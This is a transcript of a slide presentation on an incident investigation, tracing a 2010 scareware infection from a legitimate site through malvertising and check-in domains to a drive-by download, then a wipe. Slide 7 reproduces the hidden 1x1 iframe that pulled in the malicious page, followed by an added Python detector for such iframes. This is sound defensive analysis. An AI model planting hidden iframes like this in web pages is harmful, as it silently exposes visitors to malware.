Infected PC Investigation Summary

Infected PC Investigation Summary 6/8/10 infection


Transcript of Infected PC Investigation Summary

Page 1: Infected PC Investigation Summary

Infected PC Investigation Summary

6/8/10 infection

Page 2: Infected PC Investigation Summary

The story you are about to hear is true.

Only the names have been changed to

protect the innocent.

Page 3: Infected PC Investigation Summary

Page 4: Infected PC Investigation Summary

Hello,

A user's PC has been infected with a rogue antispyware called AV Security Suite; it keeps coming up with bogus viruses and basically has taken over the system. The network has been disconnected. The incident started yesterday, 6/08/10, around 4:25 pm. The user has access to level 2 protected info, but does not keep any of that info on her PC.

Thanks,
Tech Guy

Page 5: Infected PC Investigation Summary

• The user visited a legitimate site, medical-dictionary.thefreedictionary.com

• The site served up advertising through interclick.com

• One of the advertising pulls came from a known "malvertising" domain, h7.ch.adtech.com.niklip.com. Malvertising domains serve up obfuscated JavaScript that redirects browsers to malware "check-in" sites.

Page 6: Infected PC Investigation Summary

• Immediately after this pull, a request was made to a known malware "check-in" site, statsoplex.co.cc, which returned a hidden iframe. Malware check-in sites redirect browsers to SEO (Search Engine Optimization) exploit drive-by sites.

Page 7: Infected PC Investigation Summary

The iframe

<html><body><iframe src="http://aiosstatsungenett.com/info/nag3.html" style="visibility:hidden;" width="1" height="1"></iframe></body></html>
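As an added defender-side example (not part of the original presentation), a small Python parser that flags iframes hidden by CSS or sized 1x1, the pattern the check-in site used above; it is run over the captured iframe from this slide:

```python
"""Flag hidden drive-by iframes in an HTML response body (triage helper).

Added example, not the investigation's own tooling. It reports <iframe>
tags that are hidden by CSS (visibility:hidden / display:none) or sized
1x1, the technique the check-in site used to pull in the scareware page.
"""
import re
from html.parser import HTMLParser

# CSS declarations that make an element invisible to the user.
HIDDEN_STYLE = re.compile(r"(visibility\s*:\s*hidden|display\s*:\s*none)", re.I)


def _is_tiny(value):
    """True when a width/height attribute is 0 or 1 pixel."""
    try:
        return int(str(value).strip().rstrip("px").strip()) <= 1
    except ValueError:
        return False


class HiddenIframeFinder(HTMLParser):
    """Collects iframes that a user would never see on the page."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)
        reasons = []
        if HIDDEN_STYLE.search(a.get("style") or ""):
            reasons.append("hidden-by-css")
        if _is_tiny(a.get("width")) and _is_tiny(a.get("height")):
            reasons.append("1x1")
        if reasons:
            self.hits.append({"src": a.get("src", ""), "reasons": reasons})


def find_hidden_iframes(html):
    """Return a list of {src, reasons} for each suspicious iframe in html."""
    parser = HiddenIframeFinder()
    parser.feed(html)
    parser.close()
    return parser.hits


# The check-in site's response as captured in the investigation (slide 7).
CHECKIN_RESPONSE = ('<html><body><iframe src="http://aiosstatsungenett.com/info/nag3.html" '
                    'style="visibility:hidden;" width="1" height="1"></iframe></body></html>')

if __name__ == "__main__":
    for hit in find_hidden_iframes(CHECKIN_RESPONSE):
        print(hit["src"], ",".join(hit["reasons"]))
```

A proxy or IDS that inspects HTML bodies can apply the same two checks to surface drive-by redirects before the payload request is ever made.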

Page 8: Infected PC Investigation Summary

• The iframe loaded a scareware A/V page from a known SEO Exploit drive-by site, aiosstatsungenett.com. The scareware page, nag3.html, was loaded with obfuscated malware JavaScript.

Page 9: Infected PC Investigation Summary

• Two seconds later, the JavaScript that came from aiosstatsungenett.com initiated a 289K application stream to the browser from 188.65.x.x. The application stream turned out to be an infected SWF. An infected PDF was also downloaded.

Page 10: Infected PC Investigation Summary

The Malware Distribution Site

• Reverse lookup on 188.65.x.x

• protect-ware.com

• "Antispyware Soft - Powerfull PC Protection !"

Page 11: Infected PC Investigation Summary

Interesting factoid

• All 4 of the above domains were registered within a month of the infection via a Chinese registrar, todaynic.com.

• Registrant addresses were in Lithuania, Russia, and Pennsylvania.

• IP addresses were in Austria, Belgium, Sweden

Page 12: Infected PC Investigation Summary

Another interesting factoid

• A study by Avast! (the A/V vendor) found that for every 1 infected adult site there were 99 other, legitimate sites that were infected.

Page 13: Infected PC Investigation Summary

Sites that are known to have been referring clients to malicious advertising services related to this incident

Page 14: Infected PC Investigation Summary

The PC

• XP SP3, fully patched

• McAfee 8.7 with current engine and signatures

• Updated Adobe Reader

Page 15: Infected PC Investigation Summary

The Malware

• All JavaScript was obfuscated

• The payload was downloaded without user interaction

• Primarily scareware: it attempted to convince the user that Antivirus Soft could disinfect and protect her PC

• Pretty convincing product image and system tray icon; it would have fooled most users.

Page 16: Infected PC Investigation Summary

The Malware

• When the malware was uploaded to virustotal.com, only 3/41 products detected it (McAfee did not)

• The next day, the detection rate had increased to 19/41, this time including McAfee

Page 17: Infected PC Investigation Summary

Results

• No indication from firewall logs that this was anything more than an attempt to get the user to buy useless, and likely infected, software

• PC was wiped, reloaded, and returned to the user